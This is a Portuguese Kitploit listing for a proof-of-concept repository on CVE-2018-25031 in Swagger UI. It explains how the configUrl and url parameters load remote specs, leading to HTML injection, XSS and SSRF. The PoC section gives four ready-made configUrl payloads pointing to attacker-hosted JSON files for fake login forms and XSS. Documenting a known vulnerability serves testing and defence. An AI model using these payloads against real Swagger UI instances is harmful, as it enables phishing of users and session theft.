Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
swagger-ui — Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS]. | Kitploit
Ferramentas/GitHubGitHub/relichunt3r/swagger-ui
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubrelichunt3r/swagger-ui

swagger-ui

Swagger UI (CVE-2018-25031) POC, [HTMLi, XSS].

Ver Repositório
5há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Introdução: O Papel do Swagger UI

Swagger UI é uma biblioteca amplamente utilizada que renderiza especificações OpenAPI (anteriormente Swagger) em uma interface web interativa. Ela permite que desenvolvedores e integradores explorem e testem APIs sem que a implementação do backend esteja em funcionamento.

Detalhes do CVE‑2018‑25031

A Causa Raiz: Carregamento Remoto de Especificações

A vulnerabilidade decorre da validação insuficiente dos parâmetros de consulta URL usados para carregar arquivos de configuração ou especificação remotos pelo cliente Swagger UI. Os parâmetros comuns envolvidos são:

  • ?url=.yaml
  • ?configUrl=.json

Um atacante pode apontar esses parâmetros para uma definição OpenAPI ou arquivo de configuração controlado pelo atacante e hospedado remotamente, que pode ser renderizado por uma instância vulnerável.

Possíveis Vetores de Ataque

Carregar um arquivo remoto malicioso pode possibilitar vários resultados de alto impacto, dependendo da configuração de hospedagem e das proteções existentes:

  1. Injeção de HTML (HTMLi) / Phishing - arquivos injetados podem conter HTML arbitrário que falsifica visualmente o conteúdo (por exemplo, formulários de login falsos), abusando do domínio confiável de uma instância auto-hospedada.
  2. Cross‑Site Scripting (XSS) - se o conteúdo injetado incluir JavaScript executável, pode resultar em DOM XSS e permitir roubo de sessão ou ações em nome dos usuários.
  3. Server‑Side Request Forgery (SSRF) - quando servidores buscam especificações remotas em nome do cliente, um atacante pode coagir o servidor a fazer requisições a endpoints internos, potencialmente expondo recursos sensíveis.

Referências:

  • https://nvd.nist.gov/vuln/detail/CVE-2018-25031
  • https://blog.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers

Prova de Conceito (POC)

Payloads

1 - Login

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/login.json

2 - Login Remoto

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/remote-login.json

3 - Imagem

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/img.json

4 - XSS

?configUrl=https://raw.githubusercontent.com/relichunt3r/swagger-ui/refs/heads/main/xss.json

📌 Aviso Legal

O conteúdo deste repositório é fornecido apenas para fins educacionais e informativos. O autor não é responsável por qualquer uso indevido. Certifique-se de ter a devida autorização antes de usar, aja com responsabilidade por sua própria conta e risco, e siga todas as diretrizes legais e éticas.

Baixar ferramenta